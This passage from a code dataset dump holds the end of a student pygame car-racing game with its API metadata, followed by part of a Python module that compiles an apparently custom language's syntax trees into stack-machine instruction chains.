(random.randint(40, SCREEN_WIDTH - 40), 0)\r\n\r\n# PLayer class\r\nclass Player(pygame.sprite.Sprite):\r\n def __init__(self):\r\n super().__init__() \r\n self.image = pygame.image.load(\"Player.png\")\r\n self.rect = self.image.get_rect() # create a rect object \r\n self.rect.center = (160, 520) # set the center \r\n \r\n def move(self):\r\n pressed_keys = pygame.key.get_pressed()\r\n # moving PLayer object to the right or to the left \r\n if self.rect.left > 0:\r\n if pressed_keys[K_LEFT]:\r\n self.rect.move_ip(-5, 0)\r\n if self.rect.right < SCREEN_WIDTH: \r\n if pressed_keys[K_RIGHT]:\r\n self.rect.move_ip(5, 0)\r\n \r\n\r\n#Setting up Sprites \r\nP1 = Player()\r\nE1 = Enemy()\r\nC1 = Coin()\r\n\r\n#Creating Sprites Groups\r\npoints = pygame.sprite.Group()\r\nenemies = pygame.sprite.Group()\r\nenemies.add(E1)\r\npoints.add(C1)\r\nall_sprites = pygame.sprite.Group()\r\nall_sprites.add(P1)\r\nall_sprites.add(E1)\r\nall_sprites.add(C1)\r\n\r\n#Adding a new User event \r\nINC_SPEED = pygame.USEREVENT + 1\r\npygame.time.set_timer(INC_SPEED, 1000) # each time after 1 second will appear this event\r\n# creating a score to the points \r\ncnt = 0 \r\n#Game Loop\r\npygame.mixer.music.load('background.wav')\r\npygame.mixer.music.play(0)\r\nwhile True:\r\n \r\n #Cycles through all events occuring \r\n for event in pygame.event.get():\r\n # OUR-EVENT \r\n if event.type == INC_SPEED:\r\n SPEED += 0.5 \r\n # SIMPLE-EVENT \r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n # blitting our background to the surface \r\n DISPLAYSURF.blit(background, (0,0))\r\n #creating surfaces\r\n scores = font_small.render(str(SCORE), True, BLACK)\r\n earnpoints = font_small.render(str(cnt),True,BLACK)\r\n # bliting the surfaces\r\n DISPLAYSURF.blit(scores, (10,10))\r\n DISPLAYSURF.blit(earnpoints,(300,10))\r\n #Moves and Re-draws all Sprites\r\n for entity in all_sprites:\r\n entity.move()\r\n DISPLAYSURF.blit(entity.image, entity.rect)\r\n \r\n \r\n\r\n #To be run if collision occurs between Player and COIN\r\n if pygame.sprite.spritecollide(P1,points,True):\r\n cnt += 1 # increase the count \r\n print(cnt)\r\n C1 = Coin() # verating a new sprite Coin \r\n # adding our Sprite to the Group \r\n points.add(C1)\r\n all_sprites.add(C1)\r\n\r\n #To be run if collision occurs between Player and Enemy\r\n\r\n if pygame.sprite.spritecollideany(P1, enemies):\r\n pygame.mixer.music.stop() # stop the background music \r\n pygame.mixer.Sound('crash.wav').play() # playing a crash music \r\n time.sleep(1)\r\n \r\n DISPLAYSURF.fill(RED) # fill to the red \r\n # blitting surface\r\n DISPLAYSURF.blit(game_over, (30,250))\r\n \r\n pygame.display.update() # updating the display!!!\r\n for entity in all_sprites:\r\n entity.kill() # killing the sprite objects \r\n time.sleep(2)\r\n pygame.quit() # quit the pygame \r\n sys.exit() # exit frm python\r\n \r\n pygame.display.update()\r\n FramePerSec.tick(FPS)\r\n", "repo_name": "Murapov11/Python", "sub_path": "LAB8/racer.py", "file_name": "racer.py", "file_ext": "py", "file_size_in_byte": 5433, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 42, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 46, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 52, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 58, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 58, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 60, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 68, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 95, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 95, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 96, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 99, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pygame.USEREVENT", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pygame.time.set_timer", "line_number": 106, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 110, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 110, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 111, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 111, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 115, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 115, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 121, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 122, "usage_type": "call"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 140, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 140, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollideany", "line_number": 150, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 150, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.stop", "line_number": 151, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 151, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 152, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 152, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 153, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 159, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 159, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 162, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 163, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 164, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 166, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 166, "usage_type": "attribute"}]}
+{"seq_id": "69991539050", "text": "import io\nfrom collections import namedtuple\n\nfrom engine.functional import terms\nfrom engine.functional.reference import ReturnValueReference, ExceptionReference, NameReference, FrameReference, \\\n AbsoluteFrameReference\nfrom engine.functional.terms import ComparisonOperator, BooleanBinaryOperator, TRef, UnaryOperator, Read, NewDict, \\\n NewProcedure, CTerm, Lookup, CString\nfrom engine.functional.values import VReturnError, VBreakError, VContinueError, VDict, VProcedure\nfrom engine.tasks.instructions import Push, Pop, Launch, Update, Guard, StackProgram, ProgramLocation\nfrom lang.translator import Translator\nfrom util import check_type\nfrom .ast import Pass, Constant, Identifier, Attribute, Tuple, Projection, Call, Launch, Await, Comparison, \\\n BooleanBinaryOperation, UnaryOperation, ArithmeticBinaryOperation, ImportNames, ImportSource, \\\n ExpressionStatement, Assignment, Block, Return, Raise, Break, \\\n Continue, Conditional, While, For, Try, VariableDeclaration, ProcedureDefinition, \\\n PropertyDefinition, ClassDefinition, AssignableExpression\nfrom ..modules import ModuleSpecification\n\n\ndef negate(bexp):\n return terms.UnaryOperation(UnaryOperator.NOT, bexp)\n\n\nclass Chain:\n \"\"\"\n Represents a sequence of instructions. Control flow can enter this chain only at its start.\n \"\"\"\n def __init__(self):\n self._proto = []\n self._targets = set()\n self._can_continue = True\n\n def __hash__(self):\n return hash(tuple(t for t, *_ in self._proto))\n\n def _equals(self, other, bijection=None):\n if bijection is None:\n bijection = {}\n if not (self._can_continue == other._can_continue and len(self._proto) == len(other._proto)):\n return False\n try:\n return bijection[self] is other\n except KeyError:\n bijection[self] = other\n for (t1, *args1), (t2, *args2) in zip(self._proto, other._proto):\n if t1 is not t2:\n return False\n for a1, a2 in zip(args1, args2):\n if isinstance(a1, Chain):\n if not a1._equals(a2, bijection=bijection):\n return False\n elif isinstance(a1, list):\n assert t1 is Update\n if tuple(a1) != tuple(a2):\n return False\n elif isinstance(a1, dict):\n assert t1 is Guard\n if len(a1) != len(a2):\n return False\n for k, v in a1.items():\n try:\n if v != a2[k]:\n return False\n except KeyError:\n return False\n else:\n if not a1 == a2:\n return False\n return False\n\n def __eq__(self, other):\n return isinstance(other, Chain) and self._equals(other)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __add__(self, other):\n if not isinstance(other, Chain):\n raise TypeError(\"Chains can only be extended by other chains!\")\n self._assert_continuable()\n s = Chain()\n s._proto = self._proto + other._proto\n s._targets = self._targets | other._targets\n s._can_continue = other._can_continue\n return s\n\n def __str__(self):\n t2s = {Update: \"Update\", Guard: \"Guard\", Push: \"Push\", Pop: \"Pop\", Launch: \"Launch\"}\n newline = \"\"\n with io.StringIO() as s:\n for t, *args in self._proto:\n s.write(newline)\n newline = \"\\n\"\n s.write(t2s[t])\n prefix = \": \"\n for a in args:\n s.write(prefix)\n s.write(str(a))\n prefix = \", \"\n return s.getvalue()\n\n def __len__(self):\n return len(self._proto)\n\n def _assert_continuable(self):\n if self._proto is None:\n raise RuntimeError(\"This chain has been finalized and cannot be modified anymore!\")\n if not self._can_continue:\n raise RuntimeError(\"This chain cannot be extended, because of the type of its last instruction!\")\n\n def append_update(self, ref, expression, on_error):\n \"\"\"\n Appends a prototype of an update instruction to this chain.\n :param ref: An Expression specifying which part of the state is to be updated.\n :param expression: The Expression object specifying how to compute the new value.\n :param on_error: The chain to jump to if the instruction causes an error.\n \"\"\"\n self._assert_continuable()\n self._proto.append((Update, ref, expression, on_error))\n self._targets.add(on_error)\n\n def append_guard(self, alternatives, on_error):\n \"\"\"\n Appends a prototype of a guard instruction to this chain. The chain cannot be continued after a guard\n instruction.\n :param alternatives: A mapping from Expressions to Chains, specifying to which chain to jump under which\n condition.\n :param on_error: The chain to jump to in case the instruction causes an error.\n \"\"\"\n self._assert_continuable()\n self._proto.append((Guard, alternatives, on_error))\n for _, t in alternatives.items():\n self._targets.add(t)\n self._targets.add(on_error)\n self._can_continue = False\n\n def append_jump(self, target):\n \"\"\"\n Appends a prototype of an unconditional jump instruction to this chain.\n The chain cannot be continued after this.\n :param target: The chain to jump to.\n \"\"\"\n # According to the semantics, there cannot be an error in evaluating Truth():\n self.append_guard({terms.CBool(True): target}, None)\n\n def append_push(self, entry, aexpressions, on_error):\n \"\"\"\n Appends a prototype of a Push instruction to this chain.\n :param entry: An Expression that evaluates to a ProgramLocation.\n :param aexpressions: An iterable of Expression objects that determine the values for the local variables that\n are to be pushed as part of the stack frame.\n :param on_error: The chain to jump to in case the instruction causes an error.\n Note that any errors caused as long as the newly pushed stack frame still exists will _not_\n lead to this error destination! To handle those errors, instructions following the push\n instruction must explicitly treat them!\n \"\"\"\n self._assert_continuable()\n self._proto.append((Push, entry, aexpressions, on_error))\n self._targets.add(on_error)\n\n def append_pop(self):\n \"\"\"\n Appends a prototype of a Pop instruction to this chain.\n The chain cannot be continued after a pop instruction.\n \"\"\"\n self._assert_continuable()\n self._proto.append((Pop, ))\n self._can_continue = False\n\n def append_launch(self, entry, aexpressions, on_error):\n \"\"\"\n Appends a prototype of a Launch instruction to this chain.\n :param entry: An Expression that evaluates to a ProgramLocation.\n :param aexpressions: An iterable of Expression objects that determine the values for the local variables that\n are to be pushed as part of the stack frame.\n :param on_error: The chain to jump to in case the instruction causes an error.\n Note that any errors caused as long as the newly pushed stack frame still exists will _not_\n lead to this error destination! To handle those errors, instructions following the push\n instruction must explicitly treat them!\n \"\"\"\n self._assert_continuable()\n self._proto.append((Launch, entry, aexpressions, on_error))\n self._targets.add(on_error)\n\n def compile(self):\n \"\"\"\n Compiles this chain and the chains it may jump to into a StackProgram.\n :return: A StackProgram object.\n \"\"\"\n\n offset = 0\n entries = {}\n chains = [self]\n\n while len(chains) > 0:\n c = chains.pop()\n if c in entries:\n continue\n entries[c] = offset\n offset += len(c)\n chains.extend((t for t in c._targets if t is not None))\n\n instructions = []\n offset = 0\n\n for c in entries.keys(): # Enumerates the chains in the order they were inserted, guaranteeing that they start\n # exactly at the recorded offsets.\n for t, *args in c._proto:\n\n if t is Pop:\n instructions.append(Pop())\n\n else:\n *args, on_error = args\n if on_error is None:\n on_error = -1\n else:\n on_error = entries[on_error]\n\n if t is Update:\n ref, expression = args\n instructions.append(Update(ref, expression, offset + 1, on_error))\n elif t is Guard:\n alternatives, = args\n instructions.append(Guard({condition: entries[chain] for condition, chain in alternatives.items()}, on_error))\n elif t is Push:\n entry, expressions = args\n instructions.append(Push(entry, expressions, offset + 1, on_error))\n elif t is Launch:\n entry, expressions = args\n instructions.append(Launch(entry, expressions, offset + 1, on_error))\n else:\n raise NotImplementedError(\"Bug in Chain.compile: The instruction type {} \"\n \"has not been taken into account for compilation yet!\".format(t))\n offset += 1\n\n if c._can_continue:\n instructions.append(Guard({}, offset))\n offset += 1\n\n return StackProgram(instructions)\n\n\nclass BlockStack:\n \"\"\"\n Models a stack to which information about syntactic blocks can be pushed during code generation.\n \"\"\"\n\n LoopBlock = namedtuple(\"LoopBlock\", (\"headChain\", \"successorChain\"))\n ExceptionBlock = namedtuple(\"ExceptionBlock\", (\"exceptionReference\", \"finallyChain\"))\n FunctionBlock = namedtuple(\"FunctionBlock\", (\"offset\", ))\n ClassBlock = namedtuple(\"ClassBlock\", (\"offset\", ))\n ModuleBlock = namedtuple(\"ModuleBlock\", (\"offset\", ))\n\n def __init__(self):\n super().__init__()\n self._entries = []\n\n def push(self, entry):\n \"\"\"\n Pushes an entry to the top of the stack.\n :param entry: The entry to push.\n \"\"\"\n self._entries.append(entry)\n\n def pop(self):\n \"\"\"\n Removes the latest entry from the stack.\n :return: The entry that was popped.\n \"\"\"\n return self._entries.pop()\n\n @property\n def top(self):\n \"\"\"\n The entry on the top of the stack.\n \"\"\"\n return self._entries[-1]\n\n def __getitem__(self, idx):\n return self._entries[idx]\n\n def __setitem__(self, key, value):\n self._entries[key] = value\n\n def __iter__(self):\n return reversed(self._entries)\n\n def __len__(self):\n return len(self._entries)\n\n\nclass Spektakel2Stack(Translator):\n \"\"\"\n A translator that translates Spektakel AST nodes into stack programs.\n \"\"\"\n\n def __init__(self, builtin):\n \"\"\"\n Initializes a new translator.\n :param builtin: An iterable of BuiltinModuleSpecification objects that define identifiers that are to be\n builtin, i.e. valid without any explicit definition or import.\n \"\"\"\n super().__init__()\n self._decl2ref = {} # Maps declaration nodes to references.\n self._blocks = BlockStack()\n self._import_procedure = None\n self._builtin = list(builtin)\n\n def declare_name(self, chain, name, on_error):\n \"\"\"\n Statically declares a new variable name. Depending on the context the name will be declared as a stack frame\n variable, or as a namespace entry. The new variable is recorded for the given declaration, such that it can\n easily be retrieved later.\n :param chain: The Chain to which the instructions for allocating the new variable should be appended.\n :param on_error: The Chain to which control should be transferred if the allocation code fails.\n :param name: Either an AST node, or a string, under which the reference generated by this call can be retrieved\n later. It may be None, in which case an anonymous local variable is allocated on the stack.\n :return: A Reference object that represents the newly allocated variable.\n \"\"\"\n\n blocks_iter = iter(self._blocks)\n\n try:\n idx, top = 0, next(blocks_iter)\n except StopIteration:\n raise Exception(\"Bug in create_local!\")\n\n if name is None:\n pass\n elif isinstance(name, str):\n pass\n elif isinstance(name, Identifier):\n name = name.name\n elif isinstance(name, ProcedureDefinition):\n name = name.name\n elif isinstance(name, PropertyDefinition):\n name = name.name\n elif isinstance(name, ClassDefinition):\n name = name.name\n else:\n raise TypeError(f\"Cannot declare names for objects of type {type(name)}!\")\n\n while True:\n if isinstance(top, BlockStack.FunctionBlock) \\\n or (name is None and isinstance(top, (BlockStack.ClassBlock, BlockStack.ModuleBlock))):\n # We are declaring a local variable in the stack frame (either for a function, or in a class/module\n # definition, in which an anonymous variable is needed).\n # The stack frame always has the same layout for all invocations of that function/declaration,\n # so we just add one more variable to that layout.\n offset = top.offset\n self._blocks[idx] = type(top)(offset + 1)\n r = FrameReference(offset)\n self._decl2ref[name] = r\n return r\n elif isinstance(top, (BlockStack.ClassBlock, BlockStack.ModuleBlock)):\n # We are declaring a class/module member. We know that the class/module definition code is\n # running under a stack frame that has a Namespace object at offset 0. That object needs to be extended.\n slot = FrameReference(0)\n r = NameReference(slot, name)\n chain.append_update(TRef(r), terms.CNone(), on_error)\n self._decl2ref[name] = r\n return r\n else:\n try:\n idx, top = idx + 1, next(blocks_iter)\n except StopIteration:\n raise Exception(\"Bug in create_local!\")\n\n def decl2ref(self, name):\n \"\"\"\n Retrieves the reference that was created for the given name.\n :param name: Either an AST node, or a string, for which declare_name has been called.\n :return: A Reference object.\n \"\"\"\n try:\n return self._decl2ref[name]\n except KeyError:\n if isinstance(name, Identifier):\n return self._decl2ref[name.name]\n raise\n\n def declare_pattern(self, chain, pattern, on_error):\n \"\"\"\n Statically declares new variable names for an entire pattern of names.\n Depending on the context the names will be declared as stack frame\n variables, or as a namespace entries. The new variables are recorded for the given pattern, such that they can\n easily be retrieved later.\n :param chain: The Chain to which the instructions for allocating the new variables should be appended.\n :param on_error: The Chain to which control should be transferred if the allocation code fails.\n :param pattern: The AssignableExpression node holding the pattern expression for which to allocate new variables.\n \"\"\"\n\n if isinstance(pattern, Identifier):\n self.declare_name(chain, pattern, on_error)\n elif isinstance(pattern, AssignableExpression):\n for c in pattern.children:\n self.declare_pattern(chain, c, on_error)\n else:\n raise TypeError(\"Patterns to be declared must only contain AssignableExpression nodes,\"\n \" not nodes of type {}!\".format(type(pattern)))\n\n def emit_assignment(self, chain, pattern, dec, expression, on_error, declaring=False):\n \"\"\"\n Emits VM code for a assigning the result of an expression evaluation to a pattern.\n :param chain: The chain to which the assignment should be appended.\n :param pattern: An AssignableExpression to which a value should be assigned.\n :param dec: A dict mapping AST nodes to decorations.\n :param expression: The expression the result of which is to be assigned.\n :param on_error: The chain that execution should jump to in case of an error.\n :param declaring: Specifies if this assignment is part of a declaration, in which case it is assumed that\n the given pattern is a *defining* occurrence of the declared name, not a *using* one.\n The difference between these cases is that *using* occurrences will be mapped to defining\n ones first, before the runtime reference for them can be retrieved.\n :return: The chain with which execution is to be continued after the call.\n \"\"\"\n\n # First we evaluate the expression:\n t, chain = self.translate_expression(chain, expression, dec, on_error)\n\n def assign(chain, pattern, t, on_error):\n if isinstance(pattern, Identifier):\n if not declaring:\n pattern = dec[pattern][1]\n r = self.decl2ref(pattern)\n chain.append_update(TRef(r), t, on_error)\n return chain\n elif isinstance(pattern, Tuple):\n # FIXME: What we are doing here will not work if t represents a general iterable! For that we would\n # need to call a procedure first that turns it into a sequence.\n for idx, c in enumerate(pattern.children):\n chain = assign(chain, c, terms.Project(t, terms.CInt(idx)), on_error)\n elif isinstance(pattern, Projection):\n callee, chain = self.translate_expression(chain, Attribute(pattern.value, \"__set_item__\"), dec, on_error)\n index, chain = self.translate_expression(chain, pattern.index, dec, on_error)\n return self.emit_call(chain, callee, [index, t], on_error)\n elif isinstance(pattern, Attribute):\n # Python's \"Descriptor How-To Guide\"\n # (https://docs.python.org/3/howto/descriptor.html#overview-of-descriptor-invocation)\n # lists the following procedure for attribute lookup:\n # def object_getattribute(obj, name):\n # \"Emulate PyObject_GenericGetAttr() in Objects/object.c\"\n # null = object()\n # objtype = type(obj)\n # cls_var = find_name_in_mro(objtype, name, null)\n # descr_get = getattr(type(cls_var), '__get__', null)\n # if descr_get is not null:\n # if (hasattr(type(cls_var), '__set__')\n # or hasattr(type(cls_var), '__delete__')):\n # return descr_get(cls_var, obj, objtype) # data descriptor\n # if hasattr(obj, '__dict__') and name in vars(obj):\n # return vars(obj)[name] # instance variable\n # if descr_get is not null:\n # return descr_get(cls_var, obj, objtype) # non-data descriptor\n # if cls_var is not null:\n # return cls_var # class variable\n # raise AttributeError(name)\n\n # We do not have general descriptors, but we have properties (which are data descriptors) and we have\n # methods (which are non-data descriptors). Hence for us the procedure above becomes this:\n\n a, chain = self.translate_expression(chain, pattern.value, dec, on_error)\n\n r = self.declare_name(chain, None, on_error)\n chain.append_update(r, terms.StoreAttrCase(a, pattern.name), on_error)\n\n csetter = terms.UnaryPredicateTerm(terms.UnaryPredicate.ISCALLABLE, r)\n cexception = terms.UnaryPredicateTerm(terms.UnaryPredicate.ISEXCEPTION, r)\n cupdate = ~(csetter | cexception)\n\n setter = Chain()\n update = Chain()\n exception = Chain()\n successor = Chain()\n chain.append_guard({csetter: setter, cupdate: update, cexception: exception}, on_error)\n\n self.emit_call(setter, r, [t], on_error)\n setter.append_jump(successor)\n\n update.append_update(r, t, on_error)\n update.append_jump(successor)\n\n exception.append_update(ExceptionReference(), r, on_error)\n exception.append_jump(on_error)\n\n return successor\n\n # TODO: Implement this for 'super', see https://docs.python.org/3/howto/descriptor.html#invocation-from-super\n # and https://www.python.org/download/releases/2.2.3/descrintro/#cooperation\n elif isinstance(pattern, AssignableExpression):\n raise NotImplementedError(\"Assignment to patterns of type {} \"\n \"has not been implemented yet!\".format(type(pattern)))\n else:\n raise TypeError(\"The pattern to which a value is assigned must be an \"\n \"AssignableExpression, not a {}!\".format(type(pattern)))\n\n return assign(chain, pattern, t, on_error)\n\n def emit_import(self, chain, spec, subnames, name, mapping, on_error):\n \"\"\"\n Emits code for an import.\n :param chain: The chain to which the import should be appended.\n :param spec: The ModuleSpecification for the module to import.\n :param name: The name the imported module should be bound to, unless the name is None.\n :param subnames: The chain of submodule names to follow from the root module. This must be an iterable of\n strings, that can be empty.\n :param mapping: A mapping from string names to be defined by this import statement to string names defined\n in the imported module.\n :param on_error: The chain that execution should jump to in case of an error.\n :return: The chain with which execution is to be continued after the call.\n \"\"\"\n\n check_type(spec, ModuleSpecification)\n\n module = spec.resolve()\n\n m, chain = self.emit_call(chain, CTerm(self._import_procedure),\n [CTerm(ProgramLocation(module, 0))], on_error)\n\n m = TRef(m)\n\n for a in subnames:\n m = terms.Lookup(m, CString(a))\n\n if name is not None:\n chain.append_update(TRef(self.declare_name(chain, name, on_error)), m, on_error)\n\n for name, member in mapping.items():\n chain.append_update(TRef(self.declare_name(chain, name, on_error)), Lookup(m, CString(member)), on_error)\n\n return chain\n\n def emit_call(self, chain, callee, args, on_error):\n \"\"\"\n Emits VM code for a procedure call.\n :param chain: The chain to which the call should be appended.\n :param callee: A Term object representing the procedure to be called.\n :param args: An iterable of term objects representing the arguments to the call.\n :param on_error: The chain that execution should jump to in case of an error.\n :return: A pair (t, c), where t is the term representing the return value of the call and c is the chain\n in which execution is to be continued after the call.\n \"\"\"\n\n # Make sure that the right number of arguments is being used:\n call = Chain()\n argc_error = Chain()\n argc_error.append_update(TRef(ExceptionReference()), terms.NewTypeError(\"Wrong number of arguments for call!\"), on_error)\n argc_error.append_jump(on_error)\n match = terms.Comparison(ComparisonOperator.EQ, terms.NumArgs(callee), terms.CInt(len(args)))\n chain.append_guard({match: call, negate(match): argc_error}, on_error)\n\n call.append_push(callee, args, on_error)\n\n successor = Chain()\n noerror = terms.Comparison(ComparisonOperator.EQ, terms.Read(TRef(ExceptionReference())), terms.CNone())\n call.append_guard({negate(noerror): on_error, noerror: successor}, on_error)\n\n rv = self.declare_name(successor, None, on_error)\n rr = ReturnValueReference()\n successor.append_update(TRef(rv), terms.Read(TRef(rr)), on_error)\n return rv, successor\n\n def translate_expression(self, chain, node, dec, on_error):\n \"\"\"\n Translates an AST expression into a machine expression.\n :param node: An AST node representing an expression.\n :param dec: A dict mapping AST nodes to decorations.\n :return: A pair (t, c), where t is the term representing the result of expression evaluation and c is the chain\n in which execution is to be continued after evaluation of the expression.\n \"\"\"\n\n if isinstance(node, Constant):\n value = dec[node]\n if isinstance(value, bool):\n return (terms.CBool(True) if value == True else terms.CBool(False)), chain\n elif isinstance(value, str):\n return terms.CString(value), chain\n elif value is None:\n return terms.CNone(), chain\n elif isinstance(value, int):\n return terms.CInt(value), chain\n elif isinstance(value, float):\n return terms.CFloat(value), chain\n else:\n raise NotImplementedError(\"Translation of constant expressions of type {}\"\n \" has not been implemented!\".format(type(value)))\n elif isinstance(node, Identifier):\n return Read(CTerm(self.decl2ref(dec[node][1]))), chain\n elif isinstance(node, Attribute):\n v, chain = self.translate_expression(chain, node.value, dec, on_error)\n\n r = self.declare_name(chain, None, on_error)\n chain.append_update(r, terms.LoadAttrCase(v, node.name), on_error)\n\n cgetter = terms.UnaryPredicateTerm(terms.UnaryPredicate.ISGETTER, r)\n\n getter = Chain()\n successor = Chain()\n chain.append_guard({cgetter: getter, ~cgetter: successor}, on_error)\n\n v, getter = self.emit_call(getter, r, [], on_error)\n getter.append_update(r, v, on_error)\n getter.append_jump(successor)\n\n return r, successor\n\n # TODO: Implement this for 'super', see https://docs.python.org/3/howto/descriptor.html#invocation-from-super\n # and https://www.python.org/download/releases/2.2.3/descrintro/#cooperation\n elif isinstance(node, Call):\n args = []\n for a in node.arguments:\n v, chain = self.translate_expression(chain, a, dec, on_error)\n args.append(v)\n\n callee, chain = self.translate_expression(chain, node.callee, dec, on_error)\n return self.emit_call(chain, callee, args, on_error)\n elif isinstance(node, Launch):\n args = []\n for a in node.arguments:\n v, chain = self.translate_expression(chain, a, dec, on_error)\n args.append(v)\n callee, chain = self.translate_expression(chain, node.callee, dec, on_error)\n chain.append_launch(callee, args, on_error)\n t = self.declare_name(chain, None, on_error)\n chain.append_update(t, terms.Read(ReturnValueReference()), on_error)\n return t, chain\n elif isinstance(node, Await):\n t = self.translate_expression(chain, node.process, dec, on_error)\n successor = Chain()\n complete = terms.UnaryPredicateTerm(terms.UnaryPredicate.ISTERMINATED, t)\n chain.append_guard({complete: successor}, on_error)\n\n successor = Chain()\n noerror = terms.Comparison(ComparisonOperator.EQ, terms.Read(ExceptionReference()), terms.CNone())\n chain.append_guard({~noerror: on_error, noerror: successor}, on_error)\n\n rv = self.declare_name(successor, None, on_error)\n rr = ReturnValueReference()\n successor.append_update(rv, terms.Read(rr), on_error)\n successor.append_update(rr, terms.CNone(), on_error)\n return rv, successor\n elif isinstance(node, Projection):\n idx, chain = self.translate_expression(chain, node.index, dec, on_error)\n v, chain = self.translate_expression(chain, node.value, dec, on_error)\n callee, chain = self.translate_expression(chain, Attribute(v, \"__get_item__\"), dec, on_error)\n return self.emit_call(chain, callee, [idx], on_error)\n elif isinstance(node, UnaryOperation):\n return terms.UnaryOperation(node.operator, self.translate_expression(chain, node.operand, dec, on_error)), chain\n elif isinstance(node, ArithmeticBinaryOperation):\n left, chain = self.translate_expression(chain, node.left, dec, on_error)\n right, chain = self.translate_expression(chain, node.right, dec, on_error)\n return terms.ArithmeticBinaryOperation(node.operator, left, right), chain\n elif isinstance(node, Comparison):\n return terms.Comparison(node.operator,\n self.translate_expression(chain, node.left, dec, on_error),\n self.translate_expression(chain, node.right, dec, on_error)), chain\n elif isinstance(node, BooleanBinaryOperation):\n # Note: Like in Python, we want AND and OR to be short-circuited. This means that we require some control\n # flow in order to possibly skip the evaluation of the right operand.\n\n v = self.declare_name(chain, None, on_error)\n left, chain = self.translate_expression(chain, node.left, dec, on_error)\n chain.append_update(v, left, on_error)\n\n rest = Chain()\n successor = Chain()\n\n if node.operator == BooleanBinaryOperator.AND:\n skip = ~terms.Read(v)\n elif node.operator == BooleanBinaryOperator.OR:\n skip = terms.Read(v)\n else:\n skip = terms.CBool(False)\n\n chain.append_guard({skip: successor, ~skip: rest})\n\n right, rest = self.translate_expression(rest, node.right, dec, on_error)\n chain.append_update(v, terms.BooleanBinaryOperation(node.operator, terms.Read(v), right), on_error)\n chain.append_jump(successor)\n return terms.Read(v), successor\n elif isinstance(node, Tuple):\n return terms.NewTuple(*(self.translate_expression(chain, c, dec, on_error) for c in node.children)), chain\n else:\n raise NotImplementedError()\n\n def emit_return(self, on_error, chain=None):\n \"\"\"\n Emits code for a return statement, under the assumption that the return value has already been set for the task.\n :param chain: The chain to emit the code to. If this is omitted, a new chain will be created.\n :param on_error: The chain to jump to in case of an error.\n :return: Either the given chain, or the newly created one (if no chain was given).\n \"\"\"\n\n if chain is None:\n chain = Chain()\n\n # Walk over the block stack (\"outwards\"), until you hit either an exception block or arrive at the function body:\n for entry in self._blocks:\n if isinstance(entry, BlockStack.ExceptionBlock):\n chain.append_update(ExceptionReference(), terms.NewJumpError(VReturnError), on_error=on_error)\n chain.append_jump(entry.finallyChain)\n return chain\n elif isinstance(entry, BlockStack.FunctionBlock):\n break\n\n # We made it to the function level without hitting an exception block.\n chain.append_update(TRef(ExceptionReference()), terms.CNone(), on_error=on_error)\n chain.append_pop()\n\n return 